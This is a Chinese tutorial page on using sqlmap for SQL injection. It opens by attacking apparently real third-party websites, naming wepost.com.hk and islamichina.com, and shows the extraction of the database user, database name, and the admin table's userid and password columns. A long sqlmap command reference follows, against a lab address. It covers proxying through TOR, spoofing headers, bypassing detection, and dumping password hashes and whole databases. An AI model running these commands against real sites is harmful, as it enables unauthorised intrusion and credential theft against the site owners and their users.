sqlmap 简单mysql注入演示[附截图]

所属分类: 软件教程 / 安全相关 阅读数: 1450
收藏 0 赞 0 分享
安装教程百度一下就有了.
首先下载需要的文件,如果是windows环境直接到https://www.jb51.net/softs/63591.html下载安装所需要的文件即可。
看大牛的视频,学习一下,附上截图....算是转载吧...只是为了分享一下..

下边是实例:

sqlmap.py -update  更新

-h                  help 

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user

/*  注解:获取当前用户名称

current user:    'root@localhost'

sqlmap简单mysql注入演示(附截图)脚本之家

   sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db

  /*当前数据库

current database:    'wepost'

sqlmap简单mysql注入演示(附截图)脚本之家

 sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"

sqlmap简单mysql注入演示(附截图)脚本之家

 

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns 

-T "admin" -D "wepost"

sqlmap简单mysql注入演示(附截图)脚本之家

sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容

sqlmap简单mysql注入演示(附截图)脚本之家

sqlmap简单mysql注入演示(附截图)脚本之家

sqlmap简单中文说明

更新
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell //执行SQL语句
sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 //更详细的信息
load options from a configuration INI file
sqlmap -c sqlmap.conf

使用POST方法提交
sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/post_int.php" --method POST --data "id=1"
使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1
使用referer欺骗
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3
使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -a "./txt/user-agents.txt"
使用基本认证
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3
使用Digest认证
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3
使用代理,配合TOR
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"
使用多线程猜解
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3
绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"
* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server
指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"
* Linux
* Windows
自定义payload
Options: --prefix and --postfix
In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";:
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 -p "id" --prefix "'" --postfix "AND 'test'='test"
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]
As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1') AND 7433=7433 AND ('test'='test
and makes the query syntatically correct to the page query:
SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
页面比较
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v
排除网站的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"
多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1
union注入测试
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1
unionz注入配合orderby
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs
fingerprint
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b
判断当前用户是否是dba
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
列举数据库用户
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --users -v 0
列举数据库用户密码
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --passwords -U sa -v 0
查看用户权限
python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --privileges -U postgres -v 0
列数据库
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
列出指定数据库指定表的列名
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --columns -T users -D test -v 1
列出指定数据库的指定表的指定列的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump -T users -D master -C surname -v 0
指定列的范围从2-4
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump -T users -D test --start 2 --stop 4 -v 0
导出所有数据库,所有表的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --dump-all --exclude-sysdbs -v 0
sql query
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query "SELECT usename FROM pg_user" -v 0
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
SELECT usename, passwd FROM pg_shadow ORDER BY usename
保存和恢复会话
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 -s "sqlmap.log"
保存选项到INC配置文件
python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -b -v 1 --save

更多精彩内容其他人还在看

腾讯电脑管家怎么下载和卸载软件?

腾讯电脑管家的软件管理功能是针对电脑中的软件,进行装机应用卸载升级等一些操作为一体的工具箱。那么腾讯电脑管家怎么下载和卸载软件?下面小编就为大家详细介绍一下,来看看吧
收藏 0 赞 0 分享

360安全卫士如何限制上传下载速度 360限制上传下载速度教程

很多人经常同时运行多个软件,有些软件会在后台自动执行上传和下载,这样就会使得网速变得很慢,那么360安全卫士如何限制上传下载速度呢?下面小编把解决办法分享到脚本之家平台供大家参考
收藏 0 赞 0 分享

腾讯电脑管家怎么给qq浏览器设置划词搜索功能?

腾讯电脑管家怎么给qq浏览器设置划词搜索功能?使用划词搜索是比较方便的,我们可以使用浏览器设置,同样也可以使用电脑管家设置,下面我们来卡看电脑管家设置的方法
收藏 0 赞 0 分享

360安全卫士清理电脑时怎么查看垃圾详情?

360安全卫士清理电脑时怎么查看垃圾详情?使用360清理电脑垃圾,但是为了防止误删除有用的文件,想查看垃圾的详细情况,该怎么查看呢?下面我们来看看详细的教程,需要的朋友可以参考下
收藏 0 赞 0 分享

360安全卫士高危漏洞开机就运行扫描该怎办?

360安全卫士高危漏洞开机就运行扫描该怎办?开机就开始扫描漏洞,导致其他软件打开很慢,想供禁止开机进行高危漏洞扫描,该怎么设置呢?下面我们来看看360安全卫士高危漏洞禁止开机扫描的教程
收藏 0 赞 0 分享

鲁大师迷你首页怎么关闭? 鲁大师两种取消弹出迷你新闻页的方法

鲁大师迷你首页怎么关闭?每次开机总是弹出窗口新闻,每次都手动关闭太麻烦,想关闭鲁大师弹出窗口,该怎么设置呢?下面分享两种鲁大师取消弹出迷你新闻页的方法
收藏 0 赞 0 分享

[下载]盘古团队发布XcodeGhost病毒检测工具:超800个应用被感染

由于通过非官方途径下载苹果 Xcode 被植入恶意代码,导致多款应用感染 XcodeGhost 病毒,以越狱出名的国内盘古团队发布 XcodeGhost 病毒检测工具,工具暂时不兼容 iOS7 版本,后续将进行更新。目前已经提供下载链接,大家快快下载试试吧
收藏 0 赞 0 分享

大揭秘!关于XcodeGhost病毒感染事件,你需要知道的十个问题

根据安全漏洞报告平台乌云报告显示,目前苹果应用商店中已有大量应用感染上了一种名叫XcodeGhost的病毒。这种病毒不仅会在应用运行时窃取用户信息,甚至还会模拟收费或帐号弹窗来窃取你的iCloud及iTunes密码。下面小编就为大家揭秘关于XcodeGhost病毒感染事件
收藏 0 赞 0 分享

迅雷澄清质疑:公布XcodeGhost病毒污染源的主要下载链接列表

xcodeghost病毒作者发表声明称,xcodeghost源于自己的实验,没有任何威胁性行为,同时公开了源代码。但依然无法消除众多用户的担忧,再加上iCloud账户密码被泄露事件时有发生,依旧弄得人心惶惶,现在迅雷公布XcodeGhost病毒污染源的主要下载链接列表,一起来看看
收藏 0 赞 0 分享

如何解决卡巴斯基KIS版6.0与金山词霸的冲突

我的卡巴斯基从5.0换为KAV版,再换为kis版,除了常被列入黑名单外,一直相安无事。昨日突然发飙,在卡巴运行时如果打开金山词霸2006则词霸立即没有响应,停进程也没有用。通过本篇文章把我的解决方案分享给大家
收藏 0 赞 0 分享
查看更多